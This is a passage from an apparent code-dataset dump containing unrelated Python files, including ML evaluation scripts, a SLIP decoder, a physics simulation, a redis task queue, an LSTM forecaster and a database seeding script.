Array of vertex positions, three per face\n# verts = np.empty((36, 3, 3), dtype=np.float32)\n# theta = np.linspace(0, 2*np.pi, 37)[:-1]\n# verts[:,0] = np.vstack([2*np.cos(theta), 2*np.sin(theta), [0]*36]).T\n# verts[:,1] = np.vstack([4*np.cos(theta+0.2), 4*np.sin(theta+0.2), [-1]*36]).T\n# verts[:,2] = np.vstack([4*np.cos(theta-0.2), 4*np.sin(theta-0.2), [1]*36]).T\n#\n# ## Colors are specified per-vertex\n# colors = np.random.random(size=(verts.shape[0], 3, 4))\n# m2 = gl.GLMeshItem(vertexes=verts, vertexColors=colors, smooth=False, shader='balloon',\n# drawEdges=True, edgeColor=(1, 1, 0, 1))\n# m2.translate(-5, 5, 0)\n# w.addItem(m2)\n\n\n\n\n \n\n\n## Start Qt event loop unless running in interactive mode.\nif __name__ == '__main__':\n import sys\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n","sub_path":"three_dim_plotting/example_GLMeshItem_box_w_shading.py","file_name":"example_GLMeshItem_box_w_shading.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"420277044","text":"\"\"\" Evaluate the baselines ont ROUGE/METEOR\"\"\"\n\"\"\" Adapted from https://github.com/ChenRocks/fast_abs_rl \"\"\"\nimport argparse\nimport json\nimport os\nfrom os.path import join, exists\nimport bert_score\nimport re\nimport torch\n\n\ndef _count_data(path):\n \"\"\" count number of data in the given path\"\"\"\n matcher = re.compile(r'[0-9]+\\.ref')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data\n\n\ndef _read_file(filename):\n # print(dec_fname)\n summary_sent_list_lower = []\n with open(filename) as f:\n for _, l in enumerate(f):\n summary_sent_list_lower.append(l.strip().lower())\n summary_str_lower = ' '.join(summary_sent_list_lower)\n return summary_str_lower\n\n\ndef _construct_list(dec_dir, ref_dir):\n print(dec_dir)\n print(ref_dir)\n n_data = _count_data(ref_dir)\n output_summary_str_list = []\n ref_summary_str_list = []\n for i in range(n_data):\n dec_fname = join(dec_dir, '{}.dec'.format(i))\n output_summary_str_lower = _read_file(dec_fname)\n output_summary_str_list.append(output_summary_str_lower)\n ref_fname = join(ref_dir, '{}.ref'.format(i))\n ref_summary_str_lower = _read_file(ref_fname)\n ref_summary_str_list.append(ref_summary_str_lower)\n return output_summary_str_list, ref_summary_str_list\n\n\ndef main():\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n parser = argparse.ArgumentParser('Calculate BERTScore')\n parser.add_argument('--lang', type=str, default=None,\n help='two-letter abbreviation of the language (e.g., en) or \"en-sci\" for scientific text')\n parser.add_argument('-m', '--model', default=None,\n help='BERT model name (default: bert-base-uncased) or path to a pretrain model')\n parser.add_argument('-l', '--num_layers', type=int, default=None, help='use first N layer in BERT (default: 8)')\n parser.add_argument('-b', '--batch_size', type=int, default=64, help='batch size (default: 64)')\n parser.add_argument('--nthreads', type=int, default=4, help='number of cpu workers (default: 4)')\n parser.add_argument('--idf', action='store_true', help='BERT Score with IDF scaling')\n parser.add_argument('--rescale-with-baseline', action='store_true', help='Rescaling the numerical score with precomputed baselines')\n #parser.add_argument('-s', '--seg_level', action='store_true', help='show individual score of each pair')\n parser.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')\n parser.add_argument('--decode_dir', action='store', required=True, help='directory of decoded summaries')\n parser.add_argument('--data', action='store', required=True, help='directory of decoded summaries')\n\n args = parser.parse_args()\n\n dec_dir = join(args.decode_dir, 'output')\n with open(join(args.decode_dir, 'log.json')) as f:\n split = json.loads(f.read())['split']\n ref_dir = join(args.data, 'refs', split)\n print(ref_dir)\n assert exists(ref_dir)\n\n output_summary_str_list, ref_summary_str_list = _construct_list(dec_dir, ref_dir)\n all_preds, hash_code = bert_score.score(cands=output_summary_str_list, refs=ref_summary_str_list, model_type=args.model, num_layers=args.num_layers,\n verbose=args.verbose, idf=args.idf, batch_size=args.batch_size,\n lang=args.lang, return_hash=True,\n rescale_with_baseline=args.rescale_with_baseline)\n avg_scores = [s.mean(dim=0) for s in all_preds]\n P = avg_scores[0].cpu().item()\n R = avg_scores[1].cpu().item()\n F1 = avg_scores[2].cpu().item()\n msg = hash_code + \\\n f' R: {R:.6f} P: {P:.6f} F1: {F1:.6f}'\n print(msg)\n \"\"\"\n if args.seg_level:\n ps, rs, fs = all_preds\n for p, r, f in zip(ps, rs, fs):\n print('{:.6f}\\t{:.6f}\\t{:.6f}'.format(p, r, f))\n \"\"\"\n\n f1_all = all_preds[2]\n f1_all_list = f1_all.cpu().tolist()\n with open(join(args.decode_dir, 'bertscore.txt'), 'w') as f:\n for f1 in f1_all_list:\n f.write(\"{:.6f}\\n\".format(f1))\n print(\"Finish!\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate_bert_score.py","file_name":"evaluate_bert_score.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"132201576","text":"import os\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nexperiment_base_folder = '/itet-stor/baumgach/net_scratch/logs/phiseg/lidc/'\nexperiment_list = ['probunet',\n 'phiseg_7_1',\n 'phiseg_7_5',\n 'probunet_1annot',\n 'phiseg_7_1_1annot',\n 'phiseg_7_5_1annot']\nexperiment_names = ['probunet','phiseg_7_1', 'phiseg_7_5', 'probunet_1annot', 'phiseg_7_1_1annot', 'phiseg_7_5_1annot']\nfile_list = ['ged100_best_ged.npz']*len(experiment_list)\n\n\nged_list = []\n\nfor folder, exp_name, file in zip(experiment_list, experiment_names, file_list):\n\n experiment_path = os.path.join(experiment_base_folder, folder, file)\n\n ged_arr = np.load(experiment_path)['arr_0']\n\n ged_list.append(ged_arr)\n\nged_tot_arr = np.asarray(ged_list).T\n\nprint('significance')\nprint('REMINDER: are you checking the right methods?')\nprint(stats.ttest_rel(ged_list[0], ged_list[1]))\n\nprint('Results summary')\nmeans = ged_tot_arr.mean(axis=0)\nstds= ged_tot_arr.std(axis=0)\n\nfor i in range(means.shape[0]):\n print('Exp. name: %s \\t %.4f +- %.4f' % (experiment_names[i], means[i], stds[i]))\n\ndf = pd.DataFrame(ged_tot_arr, columns=experiment_names)\ndf = df.melt(var_name='experiments', value_name='vals')\n\nsns.boxplot(x='experiments', y='vals', data=df)\nplt.show()","sub_path":"eval_ged_plot.py","file_name":"eval_ged_plot.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"228589745","text":"N, X = list(map(int, input().split()))\nA = ['dummy'] + list(map(int, input().split()))\n\n# dp[i][j][k]\n# i: i番目まで見た\n# j: j個選んだ\n# k: jで割ったあまりがk\ndp = [[[0]*N for _ in range(N+1)] for _ in range(N+1)]\nfor i in range(N):\n for j in range(N):\n for k in range(N):\n # i+1番目を選ぶ\n new_val = dp[i][j][k] + A[i+1]\n # print(i+1, j+1, new_val%(j+1), dp[i+1][j+i][new_val%(j+1)])\n dp[i+1][j+1][new_val%(j+1)] = max(new_val, dp[i+1][j+1][new_val%(j+1)])\n # i+1番目を選ばない\n dp[i+1][j][k] = max(dp[i][j][k], dp[i+1][j][k])\n\nprint(*dp, sep='\\n')\nans = N*X\nfor j in range(1, N+1):\n k = X%j\n print(N, j, k)\n if dp[N][j][k] == 0:\n continue\n ans = min((X-dp[N][j][k])//j, ans)\n\nprint(ans)","sub_path":"old/ABC192/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"595541248","text":"#!/usr/bin/env python3\n# coding: utf-8\n\"\"\"\nTwinleaf Generic Device Control\nCopyright 2017 Twinleaf LLC\nLicense: MIT\n\n\"\"\"\nimport binascii\nimport struct\n\nSLIP_END = 0xC0\nSLIP_END_CHAR = b\"\\xC0\"\nSLIP_ESC = 0xDB\nSLIP_ESC_END = 0xDC\nSLIP_ESC_ESC = 0xDD\nSLIP_MAX_LEN = 2048\n\nclass SLIPEncodingError(IOError):\n pass\n\ndef decode(slipbuf):\n if len(slipbuf) < 4:\n raise SLIPEncodingError(\"Packet too short\")\n msg = bytearray()\n rx_esc_next = False\n for byte in slipbuf:\n if rx_esc_next:\n rx_esc_next = False\n if byte == SLIP_ESC_END:\n msg.append(SLIP_END)\n elif byte == SLIP_ESC_ESC:\n msg.append(SLIP_ESC)\n else:\n raise SLIPEncodingError(\"Corrupt SLIP stream: SLIP_ESC not followed by valid escape code\")\n elif byte == SLIP_ESC:\n rx_esc_next = True\n elif byte == SLIP_END:\n # Should have already been framed by SLIP_END\n #raise SLIPEncodingError(\"Corrupt SLIP stream: SLIP_END in packet\")\n pass\n else:\n msg.append(byte)\n msg_checksum = struct.unpack(\"= 27 and vm <= 107:\n\t\tvc = vm - 7\n\telif vm >= 108 and vm <= 121:\n\t\tvc = vm - 8\n\telif vm >= 122 and vm <= 135:\n\t\tvc = vm - 9\n\telif vm >= 136 and vm <= 150:\n\t\tvc = vm - 10\n\telif vm >= 151 and vm <= 161:\n\t\tvc = vm - 11\n\telse:\n\t\tvc = vm\n\n\tvinte = int (vr + ((20*40)/100))\t\n\tcinquenta = vr + ((50*40)/100)\n\n\tif vc >= vr and vc <= vinte:\n\t\tinfracao1 = 1\n\t\tpenalidade = True\n\n\telif vc > vinte and vc <= cinquenta:\n\t\tinfracao1 = 2\n\t\tpenalidade = True\n\n\telif vc > cinquenta:\n\t\tinfracao1 = 3\n\t\tpenalidade = True\n\telse:\n\t\tinfracao = 0\n\t\tpenalidade = 0\t\n\tlista = [vm, vc, infracao1, penalidade,vr]\n\treturn lista\n\n","sub_path":"Testes_Individuais/controle_infracao.py","file_name":"controle_infracao.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"398311018","text":"import pybullet as p\nimport time\nimport pybullet_data\nimport os \n\npath = \"C:/Users/Faga/Desktop/Nathan/ENSTA/Cours/2A/PRe/PRe/burg-toolkit/data/tmp/table.urdf\"\n\n\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\np.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally\np.loadURDF(\"plane.urdf\")\np.setGravity(0,0,-9.81)\n\nstartPosBox = [0,0,2]\nstartOrientationBox = p.getQuaternionFromEuler([0,0,0])\nboxId = p.loadURDF(\"r2d2.urdf\",startPosBox, startOrientationBox)\n\nstartPosTable = [5,0,0]\nstartOrientationTable = p.getQuaternionFromEuler([0,0,0])\nTableId = p.loadURDF(path, startPosTable, startOrientationTable)\n\n#numJoints = p.getNumJoints(boxId)\n#print(numJoints)\n\n#print(p.getJointInfo(boxId, 2))\n#print(p.getJointInfo(boxId, 3))\n#print(p.getJointInfo(boxId, 6))\n#print(p.getJointInfo(boxId, 7))\n\nmaxForce = 500\ntargetVel = -0.01\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 2, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 3, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 6, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 7, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n\n#p.setJointMotorControlArray(bodyIndex = boxId, jointIndices = [2,3,6,7], controlMode = p.VELOCITY_CONTROL, targetVelocities = [targetVel, targetVel, targetVel, targetVel], forces = [maxForce,maxForce,maxForce,maxForce])\n#p.applyExternalForce(objectUniqueId = boxId, linkIndex = -1, forceObj = [-10,0,0], posObj = [1,0,0], flags = p.WORLD_FRAME)\n\n#set the center of mass frame (loadURDF sets base link frame) startPos/Ornp.resetBasePositionAndOrientation(boxId, startPos, startOrientation)\nfor i in range (10000):\n #print(p.getJointState(bodyUniqueId = boxId, jointIndex = 2))\n p.setJointMotorControlArray(bodyIndex = boxId, jointIndices = [2,3,6,7], controlMode = p.VELOCITY_CONTROL, targetVelocities = [i*targetVel, i*targetVel, i*targetVel, i*targetVel], forces = [maxForce,maxForce,maxForce,maxForce])\n p.stepSimulation()\n time.sleep(1./240.)\n\ncubePos, cubeOrn = p.getBasePositionAndOrientation(boxId)\nprint(cubePos,cubeOrn)\n\np.disconnect()\n","sub_path":"burg-toolkit/entrainement.py","file_name":"entrainement.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"552789879","text":"from PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass myConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1):\n super(myConv2d, self).__init__()\n padding = (kernel_size-1)//2\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size=kernel_size, padding=padding)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass dilatedConv(nn.Module):\n ''' stride == 1 '''\n\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1):\n super(dilatedConv, self).__init__()\n # f = (kernel_size-1) * d +1\n # new_width = (width - f + 2 * padding)/stride + stride\n padding = (kernel_size-1) * dilation // 2\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, dilation=dilation, padding=padding)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n return self.relu(self.bn(self.conv(x)))\n\n\nclass globalNet(nn.Module):\n def __init__(self, in_channels, out_channels, scale_factor=0.25, kernel_size=3, dilations=None):\n super(globalNet, self).__init__()\n self.scale_factor = scale_factor\n if not isinstance(in_channels, list):\n in_channels = [in_channels]\n if not isinstance(out_channels, list):\n out_channels = [out_channels]\n mid_channels = 128\n if dilations is None:\n dilations = [1, 2, 5]\n for i, n_chan in enumerate(in_channels):\n setattr(self, 'in{i}'.format(i=i),\n myConv2d(n_chan, mid_channels//2, 3))\n for i, n_chan in enumerate(out_channels):\n setattr(self, 'in_local{i}'.format(i=i),\n myConv2d(n_chan, (mid_channels+1)//2, 3))\n setattr(self, 'out{i}'.format(i=i),\n myConv2d(mid_channels, n_chan, 1))\n convs = [dilatedConv(mid_channels, mid_channels,\n kernel_size, dilation) for dilation in dilations]\n convs = nn.Sequential(*convs)\n setattr(self, 'convs{}'.format(i), convs)\n\n def forward(self, x, local_feature, task_idx=0):\n size = x.size()[2:]\n sf = self.scale_factor\n x = F.interpolate(x, scale_factor=sf)\n local_feature = F.interpolate(local_feature, scale_factor=sf)\n x = getattr(self, 'in{}'.format(task_idx))(x)\n local_feature = getattr(\n self, 'in_local{}'.format(task_idx))(local_feature)\n fuse = torch.cat((x, local_feature), dim=1)\n x = getattr(self, 'convs{}'.format(task_idx))(fuse)\n x = getattr(self, 'out{}'.format(task_idx))(x)\n x = F.interpolate(x, size=size)\n return torch.sigmoid(x)\n\n\nclass GLN(nn.Module):\n ''' global and local net '''\n\n def __init__(self, localNet, localNet_params, globalNet_params):\n super(GLN, self).__init__()\n self.localNet = localNet(**localNet_params)\n in_channels = localNet_params['in_channels']\n out_channels = localNet_params['out_channels']\n globalNet_params['in_channels'] = in_channels\n globalNet_params['out_channels'] = out_channels\n self.globalNet = globalNet(**globalNet_params)\n\n def forward(self, x, task_idx=0):\n local_feature = self.localNet(x, task_idx)['output']\n global_feature = self.globalNet(x, local_feature, task_idx)\n return {'output': global_feature*local_feature}\n","sub_path":"universal_landmark_detection/model/networks/gln.py","file_name":"gln.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"575892948","text":"import logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s [%(levelname)s] ====> %(message)s')\n\"\"\"启动与停止线程\"\"\"\nimport time\nfrom threading import Thread\n\ndef countdown(n):\n while n > 0:\n n -= 1\n time.sleep(5)\n\nif __name__ == '__main__':\n t = Thread(target=countdown, args=(10,))\n t.start() # 启动线程\n if t.is_alive():\n logging.info('Still running')\n else:\n logging.info('Completed')\n\n # 将一个线程加入当前线程,并等待它终止\n t.join()\n # 对于长时间运行的线程或者需要一直运行的后台任务,可以考虑使用后台线程\n # 后台线程无法等待,会在主线程终止时自动销毁\n Thread(target=countdown, args=(10, ), daemon=True)\n","sub_path":"高级特性/chapter12/12_1.py","file_name":"12_1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653442706","text":"from Modules.object import object\nfrom math import sin,cos,radians,degrees\nfrom Modules.collision import rect2rect\nimport pygame\n\nclass portal(object):\n\n def __init__(self,p1,angle):\n self.frames = [pygame.image.load(f'Assets\\\\gravPortal\\\\gravPortal{i+1}.png') for i in range(8)]\n for i,frame in enumerate(self.frames):\n self.frames[i] = pygame.transform.rotate(frame,-angle)\n\n self.index = 0\n self.time = 0\n self.surf = self.frames[0]\n\n self.angle = radians(angle)\n\n self.rect = self.surf.get_rect()\n self.rect.center = p1\n\n self.pts = [(p1[0]-sin(-self.angle+radians(90))*50,p1[1]-cos(-self.angle+radians(90))*50),(p1[0]+sin(-self.angle+radians(90))*50,p1[1]+cos(-self.angle+radians(90))*50)]\n\n def update(self,dtime,objects):\n\n for obj in objects:\n if type(obj).__name__ == 'player':\n if rect2rect(self.pts+[self.pts[1],self.pts[0]],obj.pts):\n obj.angle = self.angle\n\n self.time += dtime\n if self.time > 100:\n self.time -= 100\n self.index += 1\n self.index %= len(self.frames)\n\n self.surf = self.frames[self.index]\n\n def draw(self,root):\n root.blit(self.surf,self.rect)\n #pygame.draw.polygon(root, (0,0,255), self.pts+self.pts,3)\n #pygame.draw.rect(root,(0,255,0),self.rect,4)\n #pygame.draw.circle(root,(0,255,0),self.rect.center,10)\n pass","sub_path":"compilation2/Modules/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"138010573","text":"import warnings\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\nfrom sklearn.preprocessing import StandardScaler\n\nfrom autoscalingsim.scaling.policiesbuilder.metric.forecasting.forecasting_model import ForecastingModel\nfrom autoscalingsim.utils.error_check import ErrorChecker\n\n@ForecastingModel.register('lstm')\nclass LSTM(ForecastingModel):\n\n \"\"\" Long short-term memory (LSTM) recurrent neural network (RNN) for time series forecasting \"\"\"\n\n def __init__(self, config : dict):\n\n super().__init__(config)\n\n if self._model_fitted is None:\n\n forecasting_model_params = ErrorChecker.key_check_and_load('config', config)\n self.lags = ErrorChecker.key_check_and_load('lags', forecasting_model_params, self.__class__.__name__, default = 1)\n self.n_epochs = ErrorChecker.key_check_and_load('n_epochs', forecasting_model_params, self.__class__.__name__, default = 10)\n self.d = ErrorChecker.key_check_and_load('differencing_order', forecasting_model_params, self.__class__.__name__, default = 0)\n\n neurons_count = ErrorChecker.key_check_and_load('neurons_count', forecasting_model_params, self.__class__.__name__)\n loss_function = ErrorChecker.key_check_and_load('loss_function', forecasting_model_params, self.__class__.__name__, default = 'mean_squared_error')\n optimizer = ErrorChecker.key_check_and_load('optimizer', forecasting_model_params, self.__class__.__name__, default = 'adam')\n\n self.scaler = StandardScaler()\n\n self._model_fitted = tf.keras.models.Sequential([\n tf.keras.layers.LSTM(neurons_count, batch_input_shape = (1, 1, self.lags), stateful = True),\n tf.keras.layers.Dense(units = 1)\n ])\n self._model_fitted.compile(loss = loss_function, optimizer = optimizer)\n\n def load_from_location(self, path_to_models_dir : str):\n\n path_to_model_file = os.path.join(path_to_models_dir, self._construct_model_filepath())\n if os.path.isfile(path_to_model_file):\n self._model_fitted = tf.keras.models.model_load( path_to_model_file )\n\n def save_to_location(self):\n\n if not self.dir_to_store_models is None:\n if not os.path.exists(self.dir_to_store_models):\n os.makedirs(self.dir_to_store_models)\n\n path_to_model_file = os.path.join(self.dir_to_store_models, self._construct_model_filepath())\n if not self._model_fitted is None:\n self._model_fitted.save( path_to_model_file )\n\n def _internal_fit(self, data : pd.DataFrame):\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n\n if data.shape[0] > self.lags:\n lagged_data = self._introduce_explicit_lags(data)\n differenced_data = self._difference_timeseries(lagged_data)\n scaled_data = self._scale(differenced_data)\n self._fit_model(scaled_data)\n return True\n\n else:\n return False\n\n def _internal_predict(self, metric_vals : pd.DataFrame, cur_timestamp : pd.Timestamp, future_adjustment_from_others : pd.DataFrame = None):\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n forecast_interval = self._construct_future_interval(cur_timestamp)\n forecast = self._forecast(metric_vals, forecast_interval)\n forecast_unscaled = [ self._unscale(fc) for fc in forecast ]\n forecast_restored = self._undifference_timeseries(metric_vals, forecast_unscaled)\n\n return pd.DataFrame({ metric_vals.index.name : forecast_interval, 'value': forecast_restored } ).set_index(metric_vals.index.name)\n\n def _introduce_explicit_lags(self, data : pd.DataFrame):\n\n result = data.copy()\n for lag in range(0, self.lags):\n result[f'value-{lag + 1}'] = result.value.shift(lag + 1)\n\n return result.fillna(0)\n\n def _difference_timeseries(self, data : pd.DataFrame, d : int = 1):\n\n return data.diff().fillna(0)\n\n def _undifference_timeseries(self, historical_data : pd.DataFrame, forecasted_data : list):\n\n return np.cumsum(historical_data.tail(1).value.to_list() + forecasted_data).tolist()[1:]\n\n def _restore_df(self, matrix_of_numbers : np.ndarray, original_df : pd.DataFrame):\n\n data = dict()\n for i in range(matrix_of_numbers.shape[1]):\n data[original_df.columns[i]] = matrix_of_numbers[:,i]\n\n return pd.DataFrame(data, index = original_df.index)\n\n def _scale(self, data : pd.DataFrame):\n\n return self._restore_df(self.scaler.fit_transform(data), data)\n\n def _unscale(self, value : float):\n\n array = np.array([value] + [0] * (len(self.scaler.scale_) - 1))\n array = array.reshape(1, len(array))\n inverted = self.scaler.inverse_transform(array)\n\n return inverted[0, -1]\n\n def _fit_model(self, train : pd.DataFrame):\n\n X, y = train[train.columns[train.columns != 'value']].to_numpy(), train['value'].to_numpy()\n X = X.reshape(X.shape[0], 1, X.shape[1])\n\n for i in range(self.n_epochs):\n self._model_fitted.fit(X, y, epochs = 1, batch_size = 1, verbose=0, shuffle=False)\n self._model_fitted.reset_states()\n\n def _forecast(self, measurements : pd.DataFrame, forecast_interval : pd.Series):\n\n last = measurements[-self.lags:]['value'].to_numpy().flatten().tolist()\n\n predicted = list()\n for i in range(len(forecast_interval)):\n X = np.asarray(last).astype('float32')\n X = X.reshape(1, 1, self.lags)\n yhat = self._model_fitted.predict(X, batch_size = 1).flatten()\n predicted.extend(yhat)\n last = last[1:]\n last.extend(yhat)\n\n return predicted\n","sub_path":"autoscalingsim/scaling/policiesbuilder/metric/forecasting/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553723164","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Software : nothing\n# @File : zaniu_task.py\n# @Author : zaniu (Zzaniu@126.com)\n# @Date : 2019/3/21 11:29 \n# @Description : route 实现了queue 和 timeout, timeout还有点问题,终结进程不能终结进程里面产生的子进程\n# 采用 subprocess.Popen(\"cmd.exe /k taskkill /F /T /PID %i\" % process.pid, shell=True)\n# 的方式结束子进程以及孙子进程会导致后续的任务无法执行\nfrom lib.erweima import make_code\nfrom redis_publish.redis_base import MyRq\n\nzaniu = MyRq()\n\n\n@zaniu.route(queue='LevelLow', timeout=5)\ndef add_1():\n print('沙雕')\n return 2\n\n\n@zaniu.route(queue='LevelLow', timeout=20)\ndef get_serialno_spider():\n import os\n os.system(r\"python E:\\HGSpider\\run.py\")\n\n\n@zaniu.route(queue='LevelLow')\ndef generate_code():\n text = '沙雕'\n make_code(text)\n\n\n@zaniu.route(queue='LevelLow', timeout=10)\ndef add_3(x, retry=0):\n print(\"retry = \", retry)\n if x > 3: return\n if retry > 1: raise Exception('沙雕')\n return add_3(x + 1, retry=retry + 1)\n","sub_path":"redis_publish/zaniu_task.py","file_name":"zaniu_task.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"77044185","text":"import os\n\nos.environ['MIGRATION'] = '1'\n\nif not os.getenv('FLASK_ENV') == 'production':\n print(\"Loading environment variables from .env\")\n from dotenv import load_dotenv\n\n load_dotenv()\n\nimport random\nfrom pathlib import Path\nfrom difflib import get_close_matches\nfrom werkzeug.security import generate_password_hash\nfrom werkzeug.utils import secure_filename\nfrom services.database import db\n\nfrom models.model_comment import Comment\nfrom models.model_equipment import Equipment\nfrom models.model_ingredient import Ingredient\nfrom models.model_recipe import Recipe\nfrom models.model_step import Step\nfrom models.model_tag import Tag\nfrom models.model_user import User\nfrom models.relation_like import LikeRelation\nfrom models.relation_recipe_equipment import RecipeEquipmentRelation\nfrom models.relation_recipe_ingredient import RecipeIngredientRelation\nfrom models.relation_recipe_tag import RecipeTagRelation\nfrom models.relation_step_equipment import StepEquipmentRelation\nfrom models.relation_step_ingredient import StepIngredientRelation\nfrom models.relation_subscription import SubscriptionRelation\nimport pandas as pd\n\nall_models = [User, Recipe, Comment, Equipment, Ingredient, Step, Tag,\n LikeRelation, SubscriptionRelation, RecipeEquipmentRelation, RecipeIngredientRelation,\n RecipeTagRelation,\n StepEquipmentRelation, StepIngredientRelation]\n\n# Step 1: Delete all existing data\ndb.drop_tables(all_models)\ndb.create_tables(all_models)\n\n# Step 2: User\npassword = 'Test1234'\nusers_df = pd.read_csv(\"data/users.csv\", sep=';')\nusers = []\nfor user_id, user in users_df.iterrows():\n random.seed(1992 + user_id)\n userId = secure_filename(user['name'].strip()).lower().replace(\"_\", \"\") + (\"%02d\" % random.randint(0, 99))\n users.append(User(userId=userId, name=user['name'].strip(), email=user['email'].strip(),\n pw_hash=generate_password_hash(password), imgName=\"user-%s.png\" % userId\n ))\n\nUser.bulk_create(users)\n\n# Step 3: Tags\ntags_df = pd.read_csv(\"data/tags.csv\", sep=';')\ntags = []\ntag_names = []\nfor tag_id, tag in tags_df.iterrows():\n tags.append(Tag(text=tag['text'].strip()))\n tag_names.append(tag['text'].strip().lower().replace(' ', ''))\nTag.bulk_create(tags)\n\n# Step 4: Ingredients\ningredients_df = pd.read_csv(\"data/ingredients.csv\", sep=';')\ningredients = []\ningredient_names = []\nfor ingredient_id, ingredient in ingredients_df.iterrows():\n ingredients.append(Ingredient(name=ingredient['name'].strip()))\n ingredient_names.append(ingredient['name'].strip().lower().replace(' ', ''))\n\nIngredient.bulk_create(ingredients)\n\n# Step 5: Recipes\nwith Path(\"data/recipes.txt\").open('r') as f:\n lines = f.readlines()\n\nrecipes = []\nrecipe_ingredients = []\nsteps = []\nrecipe_tags = []\nrecipe_id = 0\nstep_no = 1\nfor line in lines[1:]:\n d = line.split('\\t')\n if len(d) <= 1:\n continue\n recipe_name = d[1].strip()\n ingredient_name = d[9].strip()\n step = d[12].strip() if len(d) > 12 else ''\n tag_name = d[14].strip() if len(d) > 14 else ''\n\n if recipe_name:\n recipe_serving = int(d[2]) if d[2] else 0\n recipe_prep_time = int(d[3])\n recipe_cook_time = int(d[4])\n recipe_desc = str(d[5]).strip()\n recipes.append(\n Recipe(user=users[0], name=recipe_name, serving=recipe_serving,\n preparation_time=recipe_prep_time, cooking_time=recipe_cook_time, description=recipe_desc,\n imgName=\"recipe-img.png\"))\n step_no = 1\n\n if ingredient_name:\n ingredient_name_parsed = ingredient_name.strip().lower().replace(' ', '')\n ingredient_searchs = get_close_matches(word=ingredient_name_parsed, possibilities=ingredient_names,\n cutoff=0.6)\n assert len(ingredient_searchs) > 0\n\n ingredient = ingredients[ingredient_names.index(ingredient_searchs[0])]\n\n ingredient_qty = d[7]\n ingredient_unit = d[8].strip()\n ingredient_remark = d[10].strip() if len(d) > 10 else ''\n\n recipe_ingredients.append(\n RecipeIngredientRelation(recipe=len(recipes), ingredient=ingredient,\n qty=ingredient_qty, unit=ingredient_unit, remark=ingredient_remark)\n )\n\n if step:\n steps.append(Step(no=step_no, text=step, recipe=len(recipes)))\n step_no += 1\n\n if tag_name:\n tag_name_parsed = tag_name.strip().lower().replace(' ', '')\n tag_searchs = get_close_matches(word=tag_name_parsed, possibilities=tag_names, cutoff=0.6)\n assert len(tag_searchs) > 0\n\n tag = tags[tag_names.index(tag_searchs[0])]\n recipe_tags.append(RecipeTagRelation(recipe=len(recipes), tag=tag))\n step_no += 1\n\nRecipe.bulk_create(recipes)\nRecipeIngredientRelation.bulk_create(recipe_ingredients)\nStep.bulk_create(steps)\nRecipeTagRelation.bulk_create(recipe_tags)\n\n# Step 6: Subscriptions\nsubscriptions = []\nrandom.seed(1993)\nsubscription_id = 0\nfor toUserId in range(len(users)):\n if toUserId == 20:\n fromUserIds = [i for i in range(len(users)) if i != 20]\n else:\n random.seed(1993 + toUserId)\n numFromUserId = random.randint(0, len(users) - 1)\n random.seed(1993 + toUserId + 10)\n fromUserIds = random.sample(range(len(users)), numFromUserId)\n\n if 0 not in fromUserIds:\n fromUserIds.append(0)\n\n if toUserId in 